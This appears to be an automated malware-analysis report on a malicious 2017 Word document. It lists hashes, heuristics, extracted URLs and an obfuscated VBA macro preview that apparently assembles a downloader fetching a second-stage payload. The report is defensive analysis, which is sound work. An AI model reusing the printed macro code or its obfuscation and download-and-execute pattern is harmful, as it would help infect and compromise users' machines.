Office (OLE) malware analysis — malicious · 04cc8bbd795af563

MALICIOUS

Office (OLE)

223.0 KB Created: 2017-12-12 22:12:00 Authoring application: Microsoft Office Word First seen: 2017-12-24

MD5: 58d7e93ba8e75fbc78bf6ae5566b69f3 SHA-1: f81f32f97fe1453467ba6666d6d0a58d27c73386 SHA-256: 04cc8bbd795af563668517bb4e08c6a2b7b76662412eccac2ba6738d273c0f21

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a legacy WordBasic AutoOpen macro and high-severity heuristics for VBA macros and a Shell() call, indicating malicious intent. The VBA script is heavily obfuscated but appears to be designed to download and execute a second-stage payload from one of the embedded URLs. The large slack space in the OLE structure is also a common characteristic of packed or obfuscated malware.

Heuristics 7

ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 228,352 bytes but its declared streams total only 24,669 bytes — 203,683 bytes (89%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://wounJ6+nJjiB97Q3t8JsD� In document text (OLE body)
- http://nJ6dHdFIpP8P9dwvzESCIn document text (OLE body)
- http://wounJ6+nJjiB97Q3t8JsDIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 89044 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	89044 bytes
SHA-256: `06b58c5da114f78c2e27b95c4a5dace3ae782e71b96bebc099e8b8e643f95ebb`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "DzDCwfbVaEC" Function ABtGcRvk() MfsZiiqPN = ("wfiCuXiHOIWSS" + "wPnwnXAv" + "XaBYPZBLjNRC" + "KtPthairRBtwV" + "XfikoBtGcszO" + "MwqEBKLEtjuq") + ("QuGYIbuoif" + "dcAuDQWtSsSuaz" + "mJfdwotPlwAEk" + "TthRsbYKRB" + "MAXjzzfbQok" + "BjJjNOvD") TknnhaZH = ("bKwcosuXcKaza" + "ImQpmWMzw" + "sDOBFHkKjb" + "ABvCidZ" + "IwHlYDzCWd" + "ccLdjli") + ("RVZPTwNIkUmDtm" + "qXlSpzHEOh" + "wZoYLRDjIEi" + "omLuNhkZMpCV" + "wSowJQL" + "tAoULJUAKiVH") cTZEVkXjin = Mid("pwiaDp1jf3wPext(1, 343245)'+';RuUhuas nJ6+n'+'J6=nJ6+nJ6 naGo7+aGo7J6+nJ6RuUenvnJ6+nJ6:nJ6+nJ6pubnJ6+nJ6linJ6+nJ6caGoYjti", 13, 105) vIAvimCiGHA = ("lVwzkdiV" + "csizjoWin" + "VcTjjkjhirLwVz" + "aiYhNVwFw" + "rdBAVNfa" + "hkSmPOEwAiHfXj") + ("IJzAadYXVWrG" + "hMdfVYQjIrI" + "IZwaqjUzS" + "LQizTJMwQYHZP" + "BbKzQDzSohSDc" + "fpXJMpANBWEHTM") vSmYipJMXao = ("AjPGzKBGAKSRiu" + "KEDCDSSP" + "IZOwZZdUfPK" + "CfOCGUXLvf" + "jdjFmRR" + "hTlzawFhbjw") + ("OkqHYoAzzuEj" + "ThSqUrCOkcA" + "hoFAnwiwt" + "vmbjzRTimPBUG" + "mqGpwYiIq" + "rzuwJwZmkcmjO") ODllU = ("kLjKIZPWUjO" + "tbzhQjPRbAwNZ" + "naovJjmrDWitU" + "PSCdzzHlDo" + "aDvzjNWkUlpiZ" + "fFCXbwWLsB") + ("wUPbfBWz" + "ifrrUIMI" + "lakcGRsFOcqROK" + "rlsGJojTjSoANK" + "SlOMHbY" + "NzjantJpTU") Gunra = Mid("RCKYabYif7akHMJJ4hzZC1Avn9j2wiLKWR]110+[JbFPFl", 34, 7) nzmkGffFk = ("tkuBplPNirOwq" + "AUNnwlpzXXYop" + "kdcGbRwLd" + "SEadQDiNIkm" + "PwjdzvNXd" + "vAdEOHU") + ("soqkVrKLjT" + "LjEcVOiWwSAzG" + "RJaALoasjszYic" + "SoOtiRVqYIqkl" + "GsqklEhkLU" + "OTwMiwjBiji") iiIQJWBrMbA = ("lttbsrhJ" + "jAZVoVEujdVGo" + "hwqKaZZNY" + "MXmKKuFkNXNNT" + "daswlVRDz" + "MfBjGkOSbmI") + ("jtklYksRF" + "cdhAhccDVJ" + "LwitYddIumh" + "MrwMzzj" + "fVrCYzGC" + "qYQzqXuFszGO") LBvPRpURARz = ("DYjwTCrVDpWd" + "GosYKhctOTwYdt" + "GjGpcHmL" + "IOiTzbY" + "TMXIrcUwBrpEiX" + "IjOUijBsUcnQw") + ("JunvCEQVCPGmra" + "zGWkYZnlH" + "QSUDfEMYwrzBJ" + "SZndzNwoadW" + "QfXZWJjElm" + "RXKuOsjSvwrRwm") KhKnIJqU = Mid("wIIzn4nJ6+nJ6 nJ6+nJ6in RnJ6+nJ6unJ6'+'+nJ6UnJ6+'+'nJaGo7+aGo76baGo7+aGo7nJ6+nJ6cdnJ6+nJ6)nJ6+nJ6{b5iUFukj3nzL42QfZqw3C1", 7, 92) zmZvbDz = ("KhvXUIiP" + "FozupHcUZXa" + "ENRFWTDHHw" + "zWLJGAizUWO" + "bCvincXZj" + "mGUiSzpiIUHOA") + ("dzVUuZGApu" + "DalPijYrJkFpc" + "jIpNtLMBYEqH" + "iJjlQZo" + "XEPiliXqm" + "HsmORRnvjc") WuEEK = ("hiwvRTzRmbj" + "CzVulLhaX" + "idYWwUpjzK" + "TRkURXlqaQ" + "CqhftiQl" + "IFIETWuXcbD") + ("YwjilaUnvjz" + "VbipRbGT" + "hLOIfAuc" + "NwNidrwwH" + "vzjZIAjs" + "FFBVjRrmUZGZZ") zhzrbS = ("CjZXjth" + "zpQoSJDajIc" + "KljjOQQrPwUpL" + "UXpGEopNn" + "qETEOrDnGmrR" + "pIPdqNA") + ("bcFojkcDoA" + "zzsJwMdYuhjYVD" + "AwoLwAnOPc" + "PiGbjSmuU" + "zwTQMpF" + "rDjlJkiPcCwKj") wUrEMWwLFi = Mid("Ot6641qnQs'+'it'+'enJ6+aGo7+aGo7nJ6/vMP", 10, 27) OhYKfoN = ("hWwurzqq" + "TzXPAmFIwI" + "WILdiMm" + "dXBiVmz" + "JFruwOl" + "VLCqzPRKQToY") + ("UQfLlNzS" + "CcBkvCFOH" + "XiHSJvFO" + "rRBzbsp" + "LjNBoPFJZpPTP" + "CMjAjNz") rpdpDnfcm = ("aZzLRiUX" + "ECOJtTZkiaM" + "cGUJKLiM" + "MlllrzXAwPRz" + "hLFoHCiG" + "CqzzSfBGTlKtrR") + ("YBUCkjKuKUZ" + "DWEjifRi" + "ltjswrwjoOptcQ" + "hfWLrvp" + "tWzkOFfOaih" + "InJlsOOVFkPa") BpjdpB = ("PfzrbzAfZr" + "NtfuGjOC" + "kGpuqlOp" + "aLbqqThBw" + "FIuPYMBLXRZQR" + "olIpEApl") + ("OwfiWCLN" + "nbwAprR" + "paqYrKuQCEKr" + "vzUwjQsiiIMEUd" + "NnvRYXLPumWol" + "UwAVHrdcC") dsUCZpmpps = Mid("ziYRuUnsadanJ6+nJ6sdnJ6+nJ6 nJ6+nJ6= nnJ6+nJ6ew-objecnJ6+nJ6t ran'+'dom;nJ6+nJ6RunJ6+nJ6Ubcd'+' =nJ6+nJ6 nJaGo7+aGo76+nJ65nJ6+nJ6zahtnJ6+nJ6tp://nnJ6+n'+'J6inJ6+nJ6tinJ6+nJ6ndhannJ6+nJ6ji.cnJ6+niwtj8Rqf7", 4, 191) iSfbrmBLOG = ("zwwIFrz" + "PnVAHhbJAOKviz" + "WkTchTYJHWdPGj" + "UrhpsAo" + "khnMFVEfcCEc" + "mOSdriOddR") + ("cutTNoEthA" + "vuGSnCrBNBEh" + "dPMAWZGGQSkK" + "lSnzLuXDTYX" + "qLmbESYNLp" + "cEWItcfbVILRYO") NWhjaDmz = ("uvGHzETJF" + "XvKSlvZ" + "fnZTTiIYO" + "zJoDPXjYaoGHzA" + "qHMrLof" + "H ... (truncated)

SHA-256: 06b58c5da114f78c2e27b95c4a5dace3ae782e71b96bebc099e8b8e643f95ebb

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "DzDCwfbVaEC"
Function ABtGcRvk()
MfsZiiqPN = ("wfiCuXiHOIWSS" + "wPnwnXAv" + "XaBYPZBLjNRC" + "KtPthairRBtwV" + "XfikoBtGcszO" + "MwqEBKLEtjuq") + ("QuGYIbuoif" + "dcAuDQWtSsSuaz" + "mJfdwotPlwAEk" + "TthRsbYKRB" + "MAXjzzfbQok" + "BjJjNOvD")
TknnhaZH = ("bKwcosuXcKaza" + "ImQpmWMzw" + "sDOBFHkKjb" + "ABvCidZ" + "IwHlYDzCWd" + "ccLdjli") + ("RVZPTwNIkUmDtm" + "qXlSpzHEOh" + "wZoYLRDjIEi" + "omLuNhkZMpCV" + "wSowJQL" + "tAoULJUAKiVH")
cTZEVkXjin = Mid("pwiaDp1jf3wPext(1, 343245)'+';RuUhuas nJ6+n'+'J6=nJ6+nJ6 naGo7+aGo7J6+nJ6RuUenvnJ6+nJ6:nJ6+nJ6pubnJ6+nJ6linJ6+nJ6caGoYjti", 13, 105)
vIAvimCiGHA = ("lVwzkdiV" + "csizjoWin" + "VcTjjkjhirLwVz" + "aiYhNVwFw" + "rdBAVNfa" + "hkSmPOEwAiHfXj") + ("IJzAadYXVWrG" + "hMdfVYQjIrI" + "IZwaqjUzS" + "LQizTJMwQYHZP" + "BbKzQDzSohSDc" + "fpXJMpANBWEHTM")
vSmYipJMXao = ("AjPGzKBGAKSRiu" + "KEDCDSSP" + "IZOwZZdUfPK" + "CfOCGUXLvf" + "jdjFmRR" + "hTlzawFhbjw") + ("OkqHYoAzzuEj" + "ThSqUrCOkcA" + "hoFAnwiwt" + "vmbjzRTimPBUG" + "mqGpwYiIq" + "rzuwJwZmkcmjO")
ODllU = ("kLjKIZPWUjO" + "tbzhQjPRbAwNZ" + "naovJjmrDWitU" + "PSCdzzHlDo" + "aDvzjNWkUlpiZ" + "fFCXbwWLsB") + ("wUPbfBWz" + "ifrrUIMI" + "lakcGRsFOcqROK" + "rlsGJojTjSoANK" + "SlOMHbY" + "NzjantJpTU")
Gunra = Mid("RCKYabYif7akHMJJ4hzZC1Avn9j2wiLKWR]110+[JbFPFl", 34, 7)
nzmkGffFk = ("tkuBplPNirOwq" + "AUNnwlpzXXYop" + "kdcGbRwLd" + "SEadQDiNIkm" + "PwjdzvNXd" + "vAdEOHU") + ("soqkVrKLjT" + "LjEcVOiWwSAzG" + "RJaALoasjszYic" + "SoOtiRVqYIqkl" + "GsqklEhkLU" + "OTwMiwjBiji")
iiIQJWBrMbA = ("lttbsrhJ" + "jAZVoVEujdVGo" + "hwqKaZZNY" + "MXmKKuFkNXNNT" + "daswlVRDz" + "MfBjGkOSbmI") + ("jtklYksRF" + "cdhAhccDVJ" + "LwitYddIumh" + "MrwMzzj" + "fVrCYzGC" + "qYQzqXuFszGO")
LBvPRpURARz = ("DYjwTCrVDpWd" + "GosYKhctOTwYdt" + "GjGpcHmL" + "IOiTzbY" + "TMXIrcUwBrpEiX" + "IjOUijBsUcnQw") + ("JunvCEQVCPGmra" + "zGWkYZnlH" + "QSUDfEMYwrzBJ" + "SZndzNwoadW" + "QfXZWJjElm" + "RXKuOsjSvwrRwm")
KhKnIJqU = Mid("wIIzn4nJ6+nJ6 nJ6+nJ6in RnJ6+nJ6unJ6'+'+nJ6UnJ6+'+'nJaGo7+aGo76baGo7+aGo7nJ6+nJ6cdnJ6+nJ6)nJ6+nJ6{b5iUFukj3nzL42QfZqw3C1", 7, 92)
zmZvbDz = ("KhvXUIiP" + "FozupHcUZXa" + "ENRFWTDHHw" + "zWLJGAizUWO" + "bCvincXZj" + "mGUiSzpiIUHOA") + ("dzVUuZGApu" + "DalPijYrJkFpc" + "jIpNtLMBYEqH" + "iJjlQZo" + "XEPiliXqm" + "HsmORRnvjc")
WuEEK = ("hiwvRTzRmbj" + "CzVulLhaX" + "idYWwUpjzK" + "TRkURXlqaQ" + "CqhftiQl" + "IFIETWuXcbD") + ("YwjilaUnvjz" + "VbipRbGT" + "hLOIfAuc" + "NwNidrwwH" + "vzjZIAjs" + "FFBVjRrmUZGZZ")
zhzrbS = ("CjZXjth" + "zpQoSJDajIc" + "KljjOQQrPwUpL" + "UXpGEopNn" + "qETEOrDnGmrR" + "pIPdqNA") + ("bcFojkcDoA" + "zzsJwMdYuhjYVD" + "AwoLwAnOPc" + "PiGbjSmuU" + "zwTQMpF" + "rDjlJkiPcCwKj")
wUrEMWwLFi = Mid("Ot6641qnQs'+'it'+'enJ6+aGo7+aGo7nJ6/vMP", 10, 27)
OhYKfoN = ("hWwurzqq" + "TzXPAmFIwI" + "WILdiMm" + "dXBiVmz" + "JFruwOl" + "VLCqzPRKQToY") + ("UQfLlNzS" + "CcBkvCFOH" + "XiHSJvFO" + "rRBzbsp" + "LjNBoPFJZpPTP" + "CMjAjNz")
rpdpDnfcm = ("aZzLRiUX" + "ECOJtTZkiaM" + "cGUJKLiM" + "MlllrzXAwPRz" + "hLFoHCiG" + "CqzzSfBGTlKtrR") + ("YBUCkjKuKUZ" + "DWEjifRi" + "ltjswrwjoOptcQ" + "hfWLrvp" + "tWzkOFfOaih" + "InJlsOOVFkPa")
BpjdpB = ("PfzrbzAfZr" + "NtfuGjOC" + "kGpuqlOp" + "aLbqqThBw" + "FIuPYMBLXRZQR" + "olIpEApl") + ("OwfiWCLN" + "nbwAprR" + "paqYrKuQCEKr" + "vzUwjQsiiIMEUd" + "NnvRYXLPumWol" + "UwAVHrdcC")
dsUCZpmpps = Mid("ziYRuUnsadanJ6+nJ6sdnJ6+nJ6 nJ6+nJ6= nnJ6+nJ6ew-objecnJ6+nJ6t ran'+'dom;nJ6+nJ6RunJ6+nJ6Ubcd'+' =nJ6+nJ6 nJaGo7+aGo76+nJ65nJ6+nJ6zahtnJ6+nJ6tp://nnJ6+n'+'J6inJ6+nJ6tinJ6+nJ6ndhannJ6+nJ6ji.cnJ6+niwtj8Rqf7", 4, 191)
iSfbrmBLOG = ("zwwIFrz" + "PnVAHhbJAOKviz" + "WkTchTYJHWdPGj" + "UrhpsAo" + "khnMFVEfcCEc" + "mOSdriOddR") + ("cutTNoEthA" + "vuGSnCrBNBEh" + "dPMAWZGGQSkK" + "lSnzLuXDTYX" + "qLmbESYNLp" + "cEWItcfbVILRYO")
NWhjaDmz = ("uvGHzETJF" + "XvKSlvZ" + "fnZTTiIYO" + "zJoDPXjYaoGHzA" + "qHMrLof" + "H
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.